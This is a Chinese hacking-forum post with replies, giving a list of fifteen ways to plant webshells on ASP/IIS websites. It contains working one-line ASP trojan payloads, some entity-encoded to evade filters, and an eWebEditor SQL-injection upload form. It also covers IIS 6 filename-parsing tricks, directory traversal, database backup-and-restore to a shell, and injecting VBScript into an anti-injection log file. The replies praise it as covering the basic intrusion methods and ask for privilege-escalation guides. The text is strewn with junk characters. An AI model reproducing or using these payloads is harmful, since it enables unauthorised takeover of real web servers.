返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式1 H# x8 B- l4 o- A& Y
, U/ ]; o( d, l! V/ \3 ?
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
+ W# J4 S# c+ W1 |7 |) r- C  J. b' Y& V0 `- K: D. I
3.上传漏洞:& k4 @  w' ^3 H1 H' T# }, z" x

+ {7 y5 T3 y/ d动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
' f4 o2 k7 O8 n3 P2 L
0 Q0 ^  v/ P: F# P8 U2 F逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
  L& E2 x5 m$ k- m5 V
5 H5 Z1 Z1 p. O" Z! W! M雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
- j# k1 T5 i5 ?% Y- H: ^然后在上传文件里面填要传的图片格式的ASP木马0 Z6 a( @/ R0 O; D3 L
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp- a) J- l$ O, C( s; B3 ~! u
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
, h0 g* {; ]- l
5 B" k  A% B# ?' N; z+ C) V<html>( g/ y0 q+ y7 S4 f
<head>8 X; c; N# @4 G: A( e8 Z7 j& k  Q- z
<title>ewebeditor upload.asp上传利用</title>. H0 q$ {/ `+ R
</head>
/ K4 ^: g0 k. v( Q<body>
" y  @8 ~' c3 Z0 E<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">% `7 q$ y! E) B, q, o0 s
<input type=file name=uploadfile size=100><br><br>
. |$ q3 ?% u2 J. X5 I/ Z/ r<input type=submit value=Fuck>
0 G# g1 m" p. F& Z</form>
) W. x9 H3 _( ]7 W</body>
7 a; l8 S6 A! G* I" Y</form>
- D9 K( x" V6 Y</html>$ Q9 k% @$ O8 B3 n: U* S
" D1 Y5 o/ z) m0 @5 j. e, {5 {
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
* j  z: z3 i4 D: h5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp. b. y$ q. m( E9 X
  a& e* }& \6 _9 U
利用windows2003解析。建立zjq.asp的文件夹4 o& s5 g8 S+ S' Q1 g1 N
% J# M! q+ O. _$ U2 W
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
5 D3 y  C: C* D. V; O8 i; a8 {
7 v0 J$ Y: }; {4 m1 D0 i7.cuteeditor:类似ewebeditor: ], x" F" G$ {

, x3 g" K; @$ t& f2 p8.htmleditor:同上
: h( b! J! s9 C+ o4 F, V, G$ d) T: \& P; X. K
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
% u# [; j6 V, q0 v: y( h7 D: m
1 |5 `; f1 A4 B6 s; l; D7 E<%execute request("value")%><%'<% loop <%:%>4 V7 Y. h, ^, w; Z% {" F, O% V; H' {
, G* S0 U! B5 t; S: k
<%'<% loop <%:%><%execute request("value")%>; t+ }- s+ L# k9 U
- T; ~/ |; X/ v4 s( H* C
<%execute request("value")'<% loop <%:%>' T% i6 a( ~; C7 _
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞. _2 ?: [8 a% ], {5 s, x
$ o$ R5 }8 a( p5 r3 k- l( }
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
! w( {0 t4 v+ J% Z5 S
  ?" h9 I  {2 V$ r/ h$ k) W11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3& y2 S  D9 A5 |

) R4 K6 e8 O5 {解析漏洞得到webshell
- p. ^2 S5 b5 s5 |
" f2 h1 ?, T! |6 X) o: G- ~; H9 p12.mssql差异备份,日志备份,前提需知道web路径
* s' _6 M! I) b( z/ W7 @
! u6 k9 C2 I1 A* A13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
) H8 [4 y4 }0 C# K
9 `# V3 U2 x, a8 S7 q+ g# y14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
# G! l. U% y  u9 P
$ o5 j$ b/ e; X3 P- {& s15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可( o) y- ?, x  L
7 o- {$ F  I/ U+ T3 L
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
: x% _* f; z4 h+ a: m+ M+ _4 U不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 # R) @6 d2 H3 [# g9 r0 B2 m; E! Y
1 M7 i( y& B* }. ^  f' x! k8 f$ o

$ H. H. O- |" k8 g: C很好啊、基本的入侵方法都包含了
/ f6 W$ n/ W. H5 a- h
  J, H6 D2 ^3 A7 j- j: h最好来个提权的帖子再。
% j/ ~1 H4 ?) w8 c* o9 U
" q" z" o/ {" F. |: j- s% w不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表